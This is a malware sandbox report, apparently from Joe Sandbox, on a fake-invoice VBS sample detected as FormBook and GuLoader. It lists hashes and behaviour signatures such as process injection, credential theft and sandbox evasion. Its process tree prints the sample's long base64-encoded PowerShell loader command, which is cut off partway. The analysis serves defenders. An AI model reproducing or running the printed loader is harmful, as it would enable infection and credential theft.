Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WWVN_INVOICE_8363567453.vbs

Overview

General Information

Sample Name:WWVN_INVOICE_8363567453.vbs
Analysis ID:623396
MD5:9f8e253fd51c33a2f874942ebc0d3795
SHA1:6868a9005489e56542cf0df063985132fef50f3d
SHA256:c33e4e9bf305cec123840dd87aa84c6d71e68ac82ea039418e1b8be3ed791b37
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64native
  • wscript.exe (PID: 9728 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 4736 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgBkAGUAcgBmAGkAYQB1ACAAVABhAGwAbAB3AG8AbwA1ACAAdgBpAG4AbwBsAG8AZwBpAHMAdAAgAEwATwBZAEEATABFACAAVgBhAGwAZQByAGkANAAgAGwAYQB2AGkAbgAgAEIAYQBhAHIAOQAgAGYAbwByAHYAZQBuAHQAZQBsACAATgBvAG4AYwBvAG4AdgAgAA0ACgAjAFAARQBSAFMATwBOAE4AQQBWACAAaQBkAGUAbQBwACAAcwB0AGEAcgB0ACAAYwBoAG8AeQBhAGkAbgB0AGkAIABsAG8AeABpAGMAdAAgAEgAZQBzAHQAZQBiAHIAZQAxACAARgBvAGUAbABlAGIAYQBsACAATQBvAGkAcwAgAEwAYQBsAGwAZQB0ACAATwBiAGUAbABpAHMAawAzACAAZAByAGkAawBrACAATABhAG4AYQBzAHIAIAANAAoAIwBiAGUAcwB0AHIAYQBhAGwAaQBuACAAUwBUAFIATQBQAEUASAAgAFYARQBEAEwAIABNAHkAZQBsAG8AIABEAGkAcwBoACAAQQBjAGMAZQBwAHQAMQAgAFUAbgBwAGwAMwAgAEEAUgBCAEUASgBEAFMATABTAEgAIABBAG4AbQBlAGwAZABlAGwAcwBlACAAUwBLAE8AVgBIAFkAVABUAEUAIABwAHIAcwB0AGUAcwBrAGEAYgAgAFAAdQBiAGwAaQBjAGkAcwA4ACAAVQBtAGkAbgBkAGUAbAA0ACAADQAKACMAcwBwAG8AcgB0AHMAbQBhACAARABrAG4AaQBuAGcAcwBzADQAIABEAGUAcABvAHMAaQAxACAAcgBlAGcAbgBpAG4AZwBzAGYAdQAgAHMAdQBzAHAAZQAgAEQAZQBiAGEAIAByAGUAcQB1AGkAcgAgAFMAYQBsAHQAcwB0AGUAbgBtADEAIABSAEQARQBQAEEATgBHAEkAIAANAAoAIwBTAGUAbAB2AG0AbwBkAHMAaQBnACAAUwBVAEIARAAgAGsAdgBrAHMAZgBpAG4AZwBlACAAQQBuAG8AbQAgAHQAaABhAGkAbABuAGQAZQAgAE8AbgBkAHUAIABuAG8AbgBwACAAVwBJAE4ARABCACAAYQB0AG8AbQB2AGEAYQBiAG4AZQAgAEMAaABpAGUAIABzAHUAYgBjAGgAbwByAG8AaQAgAFMAVABVAFAASABFAEYATwBLACAASQBtAGIAcgB1AGUAbQAgAEUAcgBuAHIAaQBuAGcAcwBmAHkAIABEAHIAbwBvAHAAcwBiADEAIABwAHIAYQBpAHMAZQBmAHUAbABuACAASQBOAEcARQBOACAATwB2AGUAcgAgAEgAbwBkAHMAIABPAHYAZQByAGgAYQB1AGwAZQA4ACAAdwBvAG8AZABzACAAdQByAGUAdABoAHIAbwAgAEwAbwBrAGEAbABrACAADQAKACMAUgBVAE4ARwBMAEUAUwBTAEsAIABWAGUAcgBkACAAYwB5AGMAbABvAGQAIABhAGYAZABrAG4AaQBuAGcAIABiAHUAcwBsACAAQQB0AHQAdQBuAGkAbgBnACAAUwBhAG4AaQB0AGkAcwBpACAAUABoAG8AdABvAHMAIABCAG8AcgBlAHAAbABhAHQAZgAgAE0AYQBqAG8AcgAgAEoAVQBNAEIATABFACAAVwBIAEUARQBMAEkATgAgAEwAZQBlAHAAaQB0AGQAcgA2ACAAVQBOAFUAUwBFAEQAIABNAEEARwBOACAAQQBnAHIAYQBmADEAIABBAG0AYgBlAHIAbgA0ACAAQQBuAGQAZQBuAGsAbABhADgAIABKAGEAZwBnAGUAZABuACAAcwBvAGwAaQBkAGEAdABpAG4AZwAgAEEAbgBnAGkAdgBlACAAQgBSAEUAVgBWACAATQBJAFMAVABBAE4ASwBFAFIAIAANAAoAIwBQAGEAbABlAGkAYwBoAHQAaAB5ADYAIABDAGwAbwB3AG4AZQByAGkAIAB0AHIAaQB2AHMAZQBsAHMAcAAgAFAAYQBtAGUANgAgAFQAaQBnAGgAdAB3AGkAIABVAG4AdwBpAGwAOAAgAFAAZQByAGkANAAgAFAAcgBvAGQAdQBrACAARABhAGcAYwBlAG4AdAByACAARwBSAEEATgBVAEwAQQAgAFMAagB1AHMAcwBlAG4AcwByAG8ANQAgAEkAUwBDAEgASQBBAEMAQgBFACAATABlAGUAZgA3ACAADQAKACMAVAByAGUAbQBvAHUAcgBpAG4AdAA1ACAAUwBKAFUAUwBLAEUATQBBAEwAIABEAGoAZQBsAGwAIABNAGkAbABpAHQAcgBsADkAIABHAGwAbwBzAHMAYQBuACAAUgBFAFYASQBFAFcAUwBEACAAUgBFAEUATABQAEUARABBAE4AVAAgAEgAdQBzAGgAbwBsAGQAZQAgAEEATABJAEUATgBBACAARABvAGIAYgBlAGwAdABmAHUAbgAgAFQAZQBhAHQAIABIAGkAbgBkAGUAcgBlACAAUwBrAHkAZAA3ACAAbQB5AGcAZwBlAHMAIABMAHkAbgBsAGEAYQBzAGgAIABQAGEAYQB0AHIAIABGAGEAYgByAGkAawBzADkAIAANAAoAIwBQAEEAQQBUAEUARwBOAEUAUgAgAEQAZQB0AGEAbABqAGUAcgBlAHIAIAB0AGkAZwBnAGUAcgBzAGsAZQAgAEYAaQBsAGUAcwAgAHIAZQB0AHMAbwBwAGcAcgAgAFAATABVAFIAIABKAHUAZwBlAG4AZABtAG4AcwB0ACAAVQBkAGIAdQA1ACAASABlAGEAdgB5AGgAIABtAGkAbABpACAAbQBlAGwAbwBkACAAYQBmAGwAYQBkAG4AaQBuACAADQAKACMAYQBmAHQAdgAgAGEAYQBuAGQAZQB2AGUAIABiAHIAbwBkAHkAYQBnAGEAcwAgAHQAZQBsAGUAbwBjAGUAcgBhAHMAIABPAEMAVABBAFYATwBLACAAWgBhAHIAegB1ADMAIABJAE4ARABTACAAVABXAEkAUwBDACAAUwBLAE8AVgBTAEwATwAgAFQAbwB3AG4AbABhAG4AZABsAHkAIAANAAoAIwBQAFIASQBTACAARwByAHUAcwB2AGUAagBlADkAIABVAG4AbQBhAHIAYgBsAGUAaQB6ACAAQQBMAEsATwBIAE8ATAAgAEQARQBWAEkAQQBUAEkATwBOACAASABvAG0AYQB0AG8AIABDAHIAZQBhAHQAaQAgAFMAdABvAGIAcwBiADcAIABhAG4AZgBsAGoAZQBuACAARgBvAHIAZQB0AGEAZwBlAG4AIABQAHIAbwB0ACAAVQBQAEwARQBBAFAARQBEACAAZABpAG0AcABsAGUAbQBlACAAZwBlAHIAdABoAGEAcwBoAGEAIABTAFQATwBSAEsARQBOAEIAQgAgAA0ACgAjAEEAcwBzAHUAcgBhAGIAbAAgAE0AZQB0AGEAZgBvAHIAZQByAG4AIABJAEgAVQBLAE8ATQBQACAAWAB5AGwAbwBjADgAIABTAHQAYQBuAGQAYQByACAASABhAG4AZABsAGkAbgBnAHMAbAAgAFAAZQB3AGYAdQBsAGIAbABvADIAIABNAGkAcwB0AG4AMwAgAE8AWQBTAFQARQBSACAARABlAHQAYQBpAGwAcAByACAAcgBlAGYAbwByACAAUgBJAEcAUwBSAEUAVgBJACAAYwBsAG8AZgBpAGIAIABLAE4ASQBDACAAQgByAG4AZQBsAG8AawBrACAARABlAG0AbwBuAHQAZQByADgAIAB0AGEAcgB2ACAAcwBsAGcAZQByAHMAdAAgAFUATgBEAEUAUgAgAA0ACgAjAFMAYQBuAHMAZQB2AGUAOQAgAEkAcgByAGUAcwBwACAAQgBJAFIAQwBIAEUAIABNAGUAZwBhACAARABhAGcAbABuAHMAcwBhADIAIABLAFkAUwBUACAAUwB0AG8AbQBhAHQAbwBsAG8AIABBAHQAdAB5ACAAcgB1AHQAaQBuAGUAcwBzACAAcABpAGMAYQBtAGEAcgAgAGwAYQBjAGMAaQBjAGgAZQAgAEIAWQBHAEcARQBNAFkATgAgAGcAcgBpAG0AYQBzACAAaQBuAHQAcgB1ACAAbQBhAHIAcQAgAGoAYQByAGQAbwBuAG4AIABjAGgAbwBsAG8AcwAgAE0ATwBSAEIASQAgAFMAQQBWAEEARwBFAFMAUwAgAFIASQBEAEUASABFAFMAVABFAFMAIABTAHQAZQBtAG0AZQByAGUAdABzADUAIAByAGUAdgBpACAAQgBhAHMAdABpAGwAbAA4ACAAQgBlAGQAYQAgAFMAQwBVAFIAUgBJAEUAIABVAE0ARQBEAEcAUgAgAEsAeQBsAGkAbgAgAHUAbgBmAGkAIABzAGwAaQBwACAAUABSAEUASABFAE4AUwAgAA0ACgAjAEEAbgBkAGUAbgBrAGwAYQBzAHMAIABkAGUAbQBhACAAUwBDAEkATABMAEEARQBSACAAYgBsAHIAZQBoAGEAIABSAG8AbgBpAG4AZwA4ACAAQwBVAEUATQBBAE4AUwBIAEkAIABLAGEAcwBlAHIAbgAgAFIAdQBmAGcAYQByAGQAaQBuACAAcAByAGEAbgBnAGUAbgAgAFUAUwBQAEUAQwBJAEYASQAgAFMAdQBiAGwAaQBtACAASwBFAFIATgBFAE8AUAAgAEEAcgBpAGQAIABiAHIAbgBlAGYAZAAgAA0ACgAjAEsAYQBmAGYAZQBnACAAQgBvAG8AbgBkAG8AZwBnAGwAZQAgAE4AbwBzAHQAIABSAGkAZgBsAGUAdAB0AG8AcgA3ACAAUwBVAFIARwBFAEwARQBTAFMAIABJAGQAcgB0AHMAaABqAHMAawAyACAAcgBlAHMAZQByAHYAYQB0AGkAbwAgAGsAaQBzAHMAZQAgAGcAYQB5AGwAdQBzAHMAaQB0ACAAYQB0AG8AbQBhAGYAZgBhAGwAZAAgAFIAQQBHAEUATwBVAFMAIABCAHUAdABpAGsAcwBkAHIAaQAgAG8AcABkAGEAdABlACAASABvAHIAbgBiAHIAaQA0ACAAQwBvAG4AcwBhAG4ANwAgAE0ATABLAEUASwAgAEkAbwBkAGkAZABwAGgAaQBsADYAIABJAGQAZQBhAGwAaQBzAG0AZQA0ACAARgBsAGEAZwBlACAASQBuAHYAbwBsAHYAZQByAHMANAAgAHUAbABuAGEAYQBuAGkAIABSAGsAZQBuAHUAbgAgAGwAaQBtAGUAbABpACAAYQBhAHIAcgBpACAAbQBhAGQAZABvAHgAdQBkAHYAIABIAGUAbABoAGUAcwB0AGUAbgBhACAAUABvAHMAdAB1AGwAZQByADEAIABCAGUAegBlAGwAcwBjACAAQgBsAGkAbgAgAA0ACgAjAEMAYQBzAHQAZQByADYAIAB2AGEAbgBkACAAYwBoAGEAZQBuAG8AIABTAHEAdQBhAHQAdAA1ACAASABJAEcASABMACAAQwBvAG4AYwBoAGEAZQAgAFAAYQByAHQAIABEAEUASwBMACAAcwB1AGIAcwBpAGQAZQAgAHUAbgBkAGUAIABmAGEAdQBuAGUAcgBhACAAcwBwAHIAZQBhACAAUABBAEMASQBGAEkAQwBBACAARgBKAEUATgBEAFQATABJACAAYwBlAHAAaABhAGwAbwB0AGgAbwAgAFMARQBSAFIAQQBUAEkATwAgAFMAZQByAGIAaQBzAGsAZQBsADgAIAANAAoAIwBGAEwATABFAFMAQQBOACAAQQByAGEAZwBvAHIAbgB1AG4AYQAgAGUAbgBzAHIAZQB0AHQAZQBkAGUAIABNAHkAZQBsACAAcwB1AHAAZQByAHMAZQB4AGUAIABBAGcAZwByAGEAdgBlAHIAZQAgAHQAaQBtAGUAbABvAGYAIABzAGkAbQBlAG8AbgBiAGUAdgBpACAAUABSAEUATwBQAEUATgBJAE4AIABzAG0AZQBsAHQAZQAgAGoAZQBsAGwAeQBmAGkAcwBoAGEAIABHAGUAcgByAGEAIABQAG8AaQB0AHIAYQBpAGwAbwAgAA0ACgAjAFgAZQBuAG8AZwBsAG8AcwAgAE8AdQB0AG4AIAByAGUAdgBpAHMAbwByAGYAIABWAEEAQQBCAEUATgBGAEEAIABSAHUAbQBzAGsAaQBiAGUAcgAxACAAQQB0AHQAZQBzAHQAZQA5ACAASABhAGEAbgBkAGgAdgBlAGwAcwA4ACAARABJAFAATABPAE0AIABTAEkATABFAE4AQQBMACAATwBhAGsAeQBzAGwAagBkADQAIABMAGEAdABlAG4AcwAgAG0AZgBnAGcAcgB1AG4AIABrAGEAcgB0AG8AdABlAGsAcwBvACAADQAKACMAZQBzAHQAbwAgAFQAYQBsAG0AIABUAHUAYQByAGUAZwAyACAAQgBsAG8AawBmAHUAbgBrAHQAaQAxACAARgBvAHIAbABhACAAVAByAGEAbgAxACAAQQByAGIAZQBqAGQAIABOAG8AbgBjAG8AIABzAGkAZwB0AGUAbQBlAGwAcwBvACAARwBhAGwAdgBhAG4AaQAgAEYAbwBkAGUAcgBmAGEAIABSAGUAcwBlAGMAdAA1ACAADQAKACMARQB0AGEAcABlAGwAYgBlAHQAIABCAGEAYwBrAGYAaQBzAGMAOAAgAE0AWQBMAEQAUgBFACAATQBhAGwAYwA4ACAAZwBhAG0AbQBpAGMAawB1ACAARQBnAG0AdQBuAHQAdgBhACAASABLAEEAUwAgAFUAbgBpAHIAbwBuAGkAYwA1ACAAVABpAGwAYgBhAGcAZQBzAGsAIABGAEkAUgBFAE8ARwBUAFkAVgAgAFMAdABlAGEAZABpAGUAcwB0ACAAUgBnAHQAZQBuAGQAZQBzADQAIABTAGsAdgBhAGQAcgBvAG4AZQAgAEIAcgBlAGkAcwBsAGEAawBpACAADQAKACMAVgBJAFIASwBTAE8ATQBIACAARwB1AGUAcgA4ACAATQBBAE4AQwBIAEUAIABBAGMAYwBvAG0AbQBvAGQAYQB0ACAAUwBlAG0AaQB2AGUAcgB0AGkANwAgAE4AQQBJAFYAIABMAG8AZwBvAGcAIABTAFAASQBEAFMARwAgAGcAawBhAG4AdABsACAAdAB1AGcAcgBpAGsAcwBwAHIAIABjAGgAYQBtACAAUwB5AHMAdABlAG0AYgBlADUAIABCAFIATwBOAFoARQBGACAADQAKACMAUgB1AG0AcABsAGUAbABhAHMAIABEAEEATgBTAEUATQBVAFMARQAgAE0ARQBTAE8AUgBSAEgAIABVAE4ARABJAFMAQwBPAFYARQAgAFQAaQBkAHQAYQBnAGUAcgBlAHIAIABUAHkAcABvAHMAcwB0AG8ANwAgAEIAUgBPAEsAQQBEAEUAUgBTAFIAIABNAHkAbwBzAG8AdAAgAHIAaQBkAGkAYwB1AGwAbwB1ACAAQgB1AGcAdAAgAHMAbABhAG4AdABlACAAagBvAGwAbABpAGUAZABhAG4AdAAgAE8ATQBEAEkAUgBJAEcARQBSACAARABlAHQAcgBvAG4AaQBzACAARgBhAGQAZAAzACAARAByAGkAawBrACAASwBSAEEARwBFAEYAVQBHACAAUABTAEUAVQBEAE8AQQBNAEEAIABTAFkARABEACAAVQBOAEQARQBUAFIASQBNAEUAIAB0AGEAbQBsAHUAbgBnAHMAdQAgAGwAZQBvAG4AYQByAGQAbwB1ACAATwBwAGwAcgAgAGcAZQBtAGkAbgBhAHQAIABGAHIAdQBnAHQAaAA1ACAATQBFAFQAQQAgAFYAQQBOAEQATABCACAAVQBOAFQASABPACAAbQBpAHMAcgBlAGYAZQByAHIAZQAgAEsAaABhAGwANgAgAFMAdQBrAHIAaQBuAGcAZQAgAHYAZwB0AGkAZwAgAA0ACgANAAoADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAYwBoAG8AbgBkAHIAbwBnAGEAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAZwBkAGkAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBGAG8AbgB0AHMAQQAoAHMAdAByAGkAbgBnACAAUgB1AGMAdABpAG8AdQAsAHUAaQBuAHQAIABNAHUAcwBrAGkAbAB5ADcALABpAG4AdAAgAEQAZQBiAGkANwAsAGkAbgB0ACAAYwBoAG8AbgBkAHIAbwBnAGEAMAAsAGkAbgB0ACAARgBhAHIAbQBhAGsALABpAG4AdAAgAFEAdQBpAG4AcQB1AGUAdgBlACwAaQBuAHQAIABTAEwARwBUACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQBhAGMAKABbAE0AYQByAHMAaABhAGwAQQBzACgAVQBuAG0AYQBuAGEAZwBlAGQAVAB5AHAAZQAuAEwAUABTAHQAcgApAF0AcwB0AHIAaQBuAGcAIABSAHUAYwB0AGkAbwB1ACwAdQBpAG4AdAAgAE0AdQBzAGsAaQBsAHkANwAsAGkAbgB0ACAARABlAGIAaQA3ACwAaQBuAHQAIABjAGgAbwBuAGQAcgBvAGcAYQAwACwAaQBuAHQAIABGAGEAcgBtAGEAawAsAGkAbgB0ACAAUQB1AGkAbgBxAHUAZQB2AGUALABpAG4AdAAgAFMATABHAFQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGMAaABvAG4AZAByAG8AZwBhADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEMAbABhAHQAaAByAGEANAAsAGkAbgB0ACAAVgBhAHIAZQBkAGUAawBsAGEALAByAGUAZgAgAEkAbgB0ADMAMgAgAGMAaABvAG4AZAByAG8AZwBhACwAaQBuAHQAIABPAHUAdABoAG8AdwBsAGkAbgBnADUALABpAG4AdAAgAGMAaABvAG4AZAByAG8AZwBhADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAUgBlAGEAZABGAGkAbABlACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAQwBEAEEAQwAoAGkAbgB0ACAAVgBhAHIAZQBkAGUAawBsAGEAMAAsAHUAaQBuAHQAIABWAGEAcgBlAGQAZQBrAGwAYQAxACwASQBuAHQAUAB0AHIAIABWAGEAcgBlAGQAZQBrAGwAYQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABWAGEAcgBlAGQAZQBrAGwAYQAzACwAaQBuAHQAIABWAGEAcgBlAGQAZQBrAGwAYQA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAVQBTAEUAUgAzADIAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKABJAG4AdABQAHQAcgAgAFYAYQByAGUAZABlAGsAbABhADUALABpAG4AdAAgAFYAYQByAGUAZABlAGsAbABhADYAKQA7AA0ACgANAAoAfQANAAoAIgBAAA0ACgAjAFIAZQBtAG8AcAA4ACAARABSAFQAUgBJAE4ARQBUAEkATgAgAFIAZQB0AHIAZQA0ACAAVABqAGUAcgByAGkAbAAgAFUAcgBzAGsAbwB2AHMAbQByACAARQB4AGkAbABpAGMAbQB5AHMAdAA2ACAASQBsAGQAcwBwAHkAZQBuAGQAZQAgAEIAYQBrAHQAIABNAEUATABJAE8AUgBBACAAcwByAHYAZQByAGkAIABBAHUAZwB1AHIAZQByACAADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwASABlAHQAZQByAG8AMwAuAGQAYQB0ACIADQAKACMAcABvAHMAdABwACAATQBvAG4AbwB0AG8AbgBlAHIAZQAgAFMASQBHAE4ASQBGACAAVABpAGQAcwBrAHIAYQAgAEwARQBGAFQASQAgAFIARQBGAE8AUgBNAFAATABBAE4AIABLAGwAYQBnADUAIABSAG8AdABhAG0AYQBuACAASQBuAGQAaQB2ACAAUgBvAHQAdABlAGYAbgBnAGUAIABUAGUAcgByAGkAdABvAHIAaQAyACAAWABZAEwATwBDAE8AUABBAFAAIABnAG8AZwB5AGQAZQAgAE0AaQBjAHIAbwBiAGUAcAAgAA0ACgAkAGMAaABvAG4AZAByAG8AZwBhADMAPQAwADsADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAJABjAGgAbwBuAGQAcgBvAGcAYQA4AD0AWwBjAGgAbwBuAGQAcgBvAGcAYQAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAGMAaABvAG4AZAByAG8AZwBhADMALAAwACwAWwByAGUAZgBdACQAYwBoAG8AbgBkAHIAbwBnAGEAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAEsAQQBSAFQATwAgAEMAaABpAGwAIABlAHMAcAByAGkAdABpAG4AcwB0ACAAUwBIAFIASQBMAEwASQBOACAAQgBPAFAATABTACAAQwByAHkAcAB0AG8AIABVAGsAcgBsAGkAZwBzAHQAZQAxACAATQBlAGwAbwB0AHIAYQAgAFMAVQBQAFAAUgBFAFMASQBWAEUAIABDAGgAZQBmACAAUgBvAHMAZQB2AGkAbgBlADUAIABCAGkAbABiAHIAbwBlAG